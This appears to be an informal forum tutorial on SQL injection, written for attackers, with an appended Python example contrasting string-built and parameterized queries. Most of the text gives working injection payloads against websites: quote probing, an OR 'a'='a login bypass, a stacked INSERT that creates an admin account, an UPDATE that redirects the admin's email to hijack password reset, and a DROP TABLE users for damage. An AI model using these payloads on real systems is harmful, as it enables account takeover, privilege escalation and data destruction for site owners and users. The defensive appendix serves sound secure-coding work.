SQL injections

Many of you have heard about SQL injection, and you don't want to read those long articles, so I am going to explain it to you as clearly as possible.

-What is SQL injection?

SQL injection is when you are able to trick the server into running your own SQL queries. It is commonly done through forms and through the URL. For instance, when you submit data through a form, most of the time the server builds a query from it and sends it to the database. If you can trick it into including your own SQL in that query, that is what SQL injection is all about.

-What is it used for?

It's mainly used to give or get things for you, with some common lines. There are some cases where you just mess up the whole database and the website you were attacking breaks, and your luck is over until the administrators fix it. But sometimes your injected SQL query will work, and for example you would get administrator privileges or change some information.

-Where can I find these vulnerabilities?

You should always look in the source of the website you want to inject your query into, and look at where the form is going, for example:

<form action='some_page.php?id=24' method='GET'>

One thing you need to know perfectly is the difference between POST and GET. The method POST makes the form submit the information hidden, and the method GET makes the form submit the information so that it appears in the URL. So what do I mean by POST-hidden and GET-displayed in the URL? On some websites you will see that when you submit a poll entry or something similar using the GET method, the URL looks like:

index.php?action=add&where=poll&entry=1

This is what it looks like when you are using the GET method, and the POST method is the exact opposite.

So let's get back to where you should find them. When you look at the source you will see that the value of action="some_page.php?id=24" is some_page.php?id=24. Take this and put it in the URL, and now you will have something like this:

Address: http://www.somesite.com/search/index.php?id=24

To test if this is vulnerable just add a ' at the end, like:

http://www.somesite.com/search/index.php?id=24'

If this gives you an error then it means there is a chance that the page might be vulnerable. Here is an example:

http://www.somesite.com/search/index.php?id=24' or 1=1--

-What does vulnerable code look like, and how could I inject it?

Ok, let's take a look at a common login system vulnerability. Here is the code/script:

SELECT * FROM users WHERE username = '$info' AND password='$pass';

Here the variable $info is the data that the user submitted:

some_page.php?action=login&info=grindordie&pass=bahbah

So let's say that you know how the code looks when you are attacking a site, and you managed to change it to something like this:

some_page.php?action=login&info=grindordie_admin' OR 'a'='a&pass=bahbah' OR 'a'='a

Why doesn't 'a'='a end with a '? Because the ' is already at the end of the original code:

SELECT * FROM users WHERE username = '$info ' AND password='$pass ';

Ok, I get this, but how would the code look now?

SELECT * FROM users WHERE username = 'grindordie_admin' OR 'a'='a' AND password='bahbah' OR 'a'='a';
But this is still checking the username and password, right? Yes, but it's saying "if the username is equal to grindordie_admin or a is equal to a". Why a and not a=a? Because it's saying that a is equal to a, so it doesn't need to check the database for a matching value, because you are already giving it one.

OK, I got this, but as you said, how can I give myself admin privileges or change something?

Well, to make a new user in a database you need to know the names of the table and its columns. For example:

SELECT * FROM users WHERE username = '$info';

All you have to do is:

some_page.php?action=login&info=ha'; INSERT INTO table (user_id, username, passwords, email, admin) VALUES('666', 'Grindordie', 'bahbah', 'grindordie@gmail.com','yes');--

and the code would look like:

SELECT * FROM users WHERE username = 'ha'; INSERT INTO table (user_id, username, passwords, email, admin) VALUES('666', 'Grindordie', 'bahbah', 'grindordie@gmail.com','yes');--';

Of course you might not be successful in the first attacks: sometimes the INSERT command isn't allowed on that table, the names of the columns might be wrong, and a lot of other things might stop you from injecting.

Now let's see how you can change/delete stuff. Let's say you want to hack the "forgot password" feature. So you found a place where you can inject SQL, and you should do the following:

some_page.php?action=login&info=grindordie'; UPDATE table SET email='grindordie@gmail.com' WHERE userid='1

and the code would look like:

SELECT * FROM users WHERE username = 'grindordie'; UPDATE table SET email='grindordie@gmail.com' WHERE userid='1';

Now this changes the email that was set for user id 1 (it's mostly the admin's user id), and you would go to the forgot password feature and email yourself the admin password.

If you are a blackhat or you would like to do some damage you can always drop the table:

SELECT * FROM users WHERE username = '$info';

some_page.php?action=login&info=some_fake_name'; DROP TABLE users; --

and the code would look like:

SELECT * FROM users WHERE username = 'some_fake_name'; DROP TABLE users; --';

And there you go, now there is no more table named users.
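As an added example (not part of the original post), here is the login query from above written two ways in Python with sqlite3: pasted together from the submitted values the way $info and $pass are, and with bound parameters. The users table and its single row are constructed sample data; fed the post's ' OR 'a'='a login and the DROP TABLE input, it shows that the pasted-together query lets the first one through while the parameterized query treats both as plain strings.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the post's "users" table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, username TEXT, "
               "password TEXT, admin TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'grindordie_admin', 's3cret', 'yes')")
    db.commit()
    return db


def login_vulnerable(db, info, password):
    # The post's query with $info and $pass pasted straight into the SQL text:
    # a quote in the input closes the string early and the rest becomes SQL.
    sql = f"SELECT * FROM users WHERE username = '{info}' AND password='{password}'"
    return db.execute(sql).fetchone() is not None


def login_safe(db, info, password):
    # Same query with placeholders: the driver sends the values separately from
    # the SQL text, so a quote, an OR or a DROP in the input stays plain data.
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (info, password)).fetchone() is not None


def table_exists(db, name):
    row = db.execute("SELECT 1 FROM sqlite_master WHERE type='table' AND name=?",
                     (name,)).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    user, pw = "grindordie_admin' OR 'a'='a", "bahbah' OR 'a'='a"  # the post's login input
    print(login_vulnerable(db, user, pw))  # True: OR 'a'='a' matches every row
    print(login_safe(db, user, pw))        # False: nobody is literally named that
    print(login_safe(db, "some_fake_name'; DROP TABLE users; --", "x"))  # False
    print(table_exists(db, "users"))       # True: the table is still there
```

Whether the post's INSERT, UPDATE and DROP inputs run at all depends on the driver letting a second statement through (sqlite3's execute() refuses stacked statements outright); bound parameters settle the question for every driver, because the input never reaches the SQL parser as syntax.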



GrindorDie
